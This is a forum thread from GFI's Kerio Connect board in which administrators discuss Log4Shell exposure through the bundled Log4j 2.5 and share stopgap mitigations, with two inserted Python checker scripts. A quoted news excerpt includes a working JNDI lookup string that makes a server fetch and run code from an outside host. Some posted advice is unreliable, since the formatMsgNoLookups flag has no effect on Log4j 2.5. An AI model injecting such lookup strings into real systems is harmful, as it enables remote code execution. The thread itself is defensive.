GFI Software
Home » GFI User Forums » Kerio Connect » CVE-2021-44228 "Log4Shell"
CVE-2021-44228 "Log4Shell" [message #150625] Sat, 11 December 2021 09:00
nibs
Messages: 86
Registered: November 2007

Is there any word on whether Kerio Connect components are vulnerable to CVE-2021-44228 "Log4Shell" and if so what the mitigation is?
Re: CVE-2021-44228 "Log4Shell" [message #150626 is a reply to message #150625] Sat, 11 December 2021 10:25
PPG
Messages: 184
Registered: February 2010
Done some research. The Log4J bundled with KC 9.3.1P1 is version 2.5 (found in ..\MailServer\javaservices\im\lib).

According to several internet sources the issue is fixed in Log4j version 2.15, so basically: yeah, it's a vulnerability!

Sources:
1. https://nakedsecurity.sophos.com/2021/12/10/log4shell-java-vulnerability-how-to-safeguard-your-servers/
2. https://en.wikipedia.org/wiki/Log4j#Log4Shell_vulnerability

Would be interested to hear from GFI how to mitigate for as long as we have to wait for patches to address this.

[Updated on: Sat, 11 December 2021 10:27]


Re: CVE-2021-44228 "Log4Shell" [message #150627 is a reply to message #150625] Sat, 11 December 2021 13:35
james_bray
Messages: 5
Registered: August 2010
It would also be good to know if there are any mitigations we can apply now, prior to a patch. For instance, disabling any services or options that might rely on the log4j library.
Re: CVE-2021-44228 "Log4Shell" [message #150628 is a reply to message #150626] Sat, 11 December 2021 16:24
Backspin
Messages: 132
Registered: June 2008
Location: Amsterdam, the Netherland...
Interesting. I don't think Kerio uses Java for every service, I thought only for Full text search and IM. If you don't have these enabled, you could be safe from this.

Edit: If I understand the confusing Java naming well enough, then according to the kerio/mailserver/javaservices/jre/releases file, the version of java in at least Kerio Connect 9.2.12p1 and up is "1.8.0_222", which in Java-speak appears to be Java version 8u222.

On this page ( https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell ) it says: "If the server has Java runtimes later than 8u121, then it is protected against remote code execution by defaulting "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false""
But I'm not sure, since Kerio uses OpenJDK, and I don't know if the numbering is the same.
[Updated on: Sat, 11 December 2021 21:32]


Re: CVE-2021-44228 "Log4Shell" [message #150631 is a reply to message #150628] Sun, 12 December 2021 11:45
AndreasL
Messages: 126
Registered: July 2008
Location: Germany
Can I download a patched version and replace the 3 files (rename them) myself, or do I have to wait for a patch from GFI?
\lib\log4j-api-2.5.jar
\lib\log4j-core-2.5.jar
\lib\log4j-slf4j-impl-2.5.jar

Is an update available soon from GFI?

[Updated on: Sun, 12 December 2021 12:06]


Re: CVE-2021-44228 "Log4Shell" [message #150632 is a reply to message #150625] Sun, 12 December 2021 18:33
edikonfetti
Messages: 2
Registered: December 2021
I deleted the JndiLookup class from log4j-core-2.5.jar until GFI releases an update. Haven't run into any issues yet. I took a backup of the original jar file, just in case.

Run with elevated privileges:
cd /opt/kerio/mailserver/javaservices/im/lib
systemctl stop kerio-connect.service
tar -cvzf log4j-core-2.5.jar-vulnerable.gz log4j-core-2.5.jar
zip -d log4j-core-2.5.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
systemctl start kerio-connect.service
Re: CVE-2021-44228 "Log4Shell" [message #150633 is a reply to message #150631] Mon, 13 December 2021 07:01
boisbleu
Messages: 62
Registered: May 2015
I don't think you can do it this way. There are 6 years of development between version 2.5 and 2.15.

The question is: can the system be infected using the default communication services of the mailserver?

So far I thought the whole system was based on Java.

[Updated on: Mon, 13 December 2021 07:14]


Re: CVE-2021-44228 "Log4Shell" [message #150634 is a reply to message #150626] Mon, 13 December 2021 07:16
FEichelsdoerfer
Messages: 35
Registered: June 2015
Location: Germany
Hi, sorry, I didn't get it.
When the Log4J bundled with KC 9.3.1P1 is version 2.5, and the issue is fixed with version 2.15 (a lower version than 2.5?), why should there be a vulnerability?
Re: CVE-2021-44228 "Log4Shell" [message #150635 is a reply to message #150634] Mon, 13 December 2021 07:25
boisbleu
Messages: 62
Registered: May 2015
https://logging.apache.org/log4j/2.x/changes-report.html

And for our German-speaking users:

Quote:
The problem arises when a service logs an event such as "Encountered X". In the Java universe the Log4j library is frequently used for this. And it does not just write that away; it tries to interpret the text X. And if that contains something like

${jndi:ldap://boser.server.de/a}

then it blows up. The service contacts "boser.server.de", accepts Java code from it and executes it. Yes, exactly, just like that.

Source: https://www.heise.de/ratgeber/Schutz-vor-Log2j-Luecke-was-hilft-jetzt-und-was-eher-nicht-6292961.html

[Updated on: Mon, 13 December 2021 07:39]


Re: CVE-2021-44228 "Log4Shell" [message #150636 is a reply to message #150635] Mon, 13 December 2021 07:29
frankdb
Messages: 2
Registered: February 2021
15 is higher than 5.

On the subject of Kerio, the IM service definitely includes the library and the vulnerable class. If the numbering scheme is correct, as Backspin mentioned, the Java version should prevent it from being exploited. I would still disable and turn off the IM service (XMPP).
Re: CVE-2021-44228 "Log4Shell" [message #150637 is a reply to message #150625] Mon, 13 December 2021 07:52
tholud
Messages: 1
Registered: December 2021
Not nice not getting a patch in time for a paid service.
Jitsi fixed it two days ago already.
But anyhow.
We fixed it by changing the configuration of the mailserver.

Go to your mailserver config file; it should be something like mailserver.cfg in the folder /opt/kerio/mailserver.

There you find several lines beginning with:

<variable name="JvmOptions"

If you don't have options here, replace this line by:

<variable name="JvmOptions">-Dlog4j2.formatMsgNoLookups=true</variable>

So this will prevent doing lookups.

Very important... before changing you have to stop the server, then change the file, then start the server again.
If you don't do it this way, the changes will be dismissed automatically.


Re: CVE-2021-44228 "Log4Shell" [message #150638 is a reply to message #150635] Mon, 13 December 2021 08:01
FEichelsdoerfer
Messages: 35
Registered: June 2015
Location: Germany
Thank you! Frightening. Somewhat unfortunate versioning, in my opinion.
Re: CVE-2021-44228 "Log4Shell" [message #150639 is a reply to message #150638] Mon, 13 December 2021 08:14
boisbleu
Messages: 62
Registered: May 2015
For older versions the developers recommend removing the JndiLookup class as a mitigation:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Best to copy it to another system and then remove the class with an archiver. Rename the old file and copy the new one over. To be safe, restart the service.

---

If using versions older than 2.10 it's recommended to remove the class JndiLookup.

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Copy the file to another system, remove the class from the archive, rename the file on the server, copy the modified file to the server and restart the service.

[Updated on: Mon, 13 December 2021 08:19]

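A small offline checker, added here as an example (not code from GFI or from anyone in this thread), that applies the reasoning of the posts above to a log4j-core jar: it parses the version from the filename as integers (so 2.15 sorts after 2.5), checks whether org/apache/logging/log4j/core/lookup/JndiLookup.class is still in the archive, and says which mitigation applies. The jar contents are constructed in memory, and the filename pattern is an assumption about how the jar is named.

```python
import io
import re
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED = (2, 15, 0)           # first release that no longer resolves JNDI lookups in messages by default
NO_LOOKUPS_MIN = (2, 10, 0)  # log4j2.formatMsgNoLookups is only read from 2.10 onward

def parse_version(filename):
    """'log4j-core-2.5.jar' -> (2, 5, 0). Compare tuples of ints, not strings: 2.15 > 2.5."""
    m = re.search(r"log4j-core-(\d+)\.(\d+)(?:\.(\d+))?\.jar$", filename)
    return tuple(int(x or 0) for x in m.groups()) if m else None

def assess(filename, jar_bytes):
    """Classify one log4j-core jar (given as bytes) and name the mitigation that applies."""
    version = parse_version(filename)
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        jndi_present = JNDI_CLASS in jar.namelist()
    if version is None:
        verdict, hint = "unknown-version", "inspect manually"
    elif version >= FIXED:
        verdict, hint = "patched", "none needed"
    elif not jndi_present:
        verdict, hint = "mitigated", "JndiLookup.class already removed"
    elif version >= NO_LOOKUPS_MIN:
        verdict, hint = "vulnerable", "remove JndiLookup.class or set -Dlog4j2.formatMsgNoLookups=true"
    else:
        verdict, hint = "vulnerable", "remove JndiLookup.class (formatMsgNoLookups is ignored before 2.10)"
    return {"version": version, "jndi_present": jndi_present, "verdict": verdict, "hint": hint}

def fake_jar(with_jndi):
    """Constructed stand-in for a real jar: only the entries the check inspects."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("org/apache/logging/log4j/core/lookup/StrLookup.class", b"")
        if with_jndi:
            jar.writestr(JNDI_CLASS, b"")
    return buf.getvalue()

if __name__ == "__main__":
    for name, jndi in [("log4j-core-2.5.jar", True),
                       ("log4j-core-2.5.jar", False),
                       ("log4j-core-2.15.0.jar", True)]:
        print(name, assess(name, fake_jar(jndi)))
```

To check a real file, pass its basename and `open(path, "rb").read()` to `assess`.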

Re: CVE-2021-44228 "Log4Shell" [message #150640 is a reply to message #150639] Mon, 13 December 2021 09:20
AndreasL
Messages: 126
Registered: July 2008
Location: Germany
What happens if I delete/rename the 4 .jar files?
Re: CVE-2021-44228 "Log4Shell" [message #150641 is a reply to message #150640] Mon, 13 December 2021 09:35
atgfi
Messages: 1
Registered: December 2021
Hello,

You can check what has log4j open with the following command on Linux:

lsof | grep log4j

Next, try:

ps auxwww | grep java

You see it's IM and XMPP.

Disable XMPP in the webadmin tool of Kerio Connect.

Restart kerio-connect.

Try again: lsof | grep log4j

IM is always active.

Stop kerio-connect.

Change the following settings in mailserver.cfg from 1 to 0:

<table name="InstantMessaging">
...
<variable name="Enabled">0</variable>
...
</table>

<table name="WebIM">
...
<variable name="Enabled">0</variable>
...
</table>

Restart kerio-connect.

Test with lsof | grep log4j and ps auxwww | grep java

There should be no more Java processes, and I think you may now be safe.

Sorry for the quick and dirty English but I'm really busy with log4j at this time.
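An added example (not GFI's code and not from any poster) that audits a mailserver.cfg in the shape quoted in this post and in the earlier JvmOptions post: it reports whether InstantMessaging and WebIM are still Enabled=1 and whether -Dlog4j2.formatMsgNoLookups=true is set, and it flags that log4j only honours that property from 2.10, so with the bundled 2.5 the flag alone changes nothing. The sample fragments are constructed; the <config> root and the table that holds JvmOptions are assumptions, not Kerio's real layout.

```python
import xml.etree.ElementTree as ET

JAVA_TABLES = ("InstantMessaging", "WebIM")       # the two tables this post sets Enabled=0 in
NO_LOOKUPS = "-Dlog4j2.formatMsgNoLookups=true"   # the JvmOptions value from the earlier post

# Constructed fragments modelled on the mailserver.cfg excerpts quoted in the thread.
# The <config> root and the table containing JvmOptions are assumptions.
CFG_BEFORE = """<config>
<table name="InstantMessaging"><variable name="Enabled">1</variable></table>
<table name="WebIM"><variable name="Enabled">1</variable></table>
<table name="Java"><variable name="JvmOptions"></variable></table>
</config>"""
CFG_AFTER = """<config>
<table name="InstantMessaging"><variable name="Enabled">0</variable></table>
<table name="WebIM"><variable name="Enabled">0</variable></table>
<table name="Java"><variable name="JvmOptions">-Dlog4j2.formatMsgNoLookups=true</variable></table>
</config>"""

def audit_cfg(xml_text, log4j_version):
    """Report which Java-backed services are still on and whether the JVM flag would take effect."""
    root = ET.fromstring(xml_text)
    enabled = []
    for table in JAVA_TABLES:
        var = root.find(f".//table[@name='{table}']/variable[@name='Enabled']")
        if var is not None and (var.text or "").strip() == "1":
            enabled.append(table)
    opts = root.find(".//variable[@name='JvmOptions']")
    flag_set = opts is not None and NO_LOOKUPS in (opts.text or "").split()
    return {
        "java_services_enabled": enabled,
        "no_lookups_flag_set": flag_set,
        # log4j reads this property only from 2.10 on; with the bundled 2.5 it changes nothing
        "no_lookups_flag_effective": flag_set and log4j_version >= (2, 10, 0),
    }

if __name__ == "__main__":
    for label, cfg in (("before", CFG_BEFORE), ("after", CFG_AFTER)):
        print(label, audit_cfg(cfg, (2, 5, 0)))
```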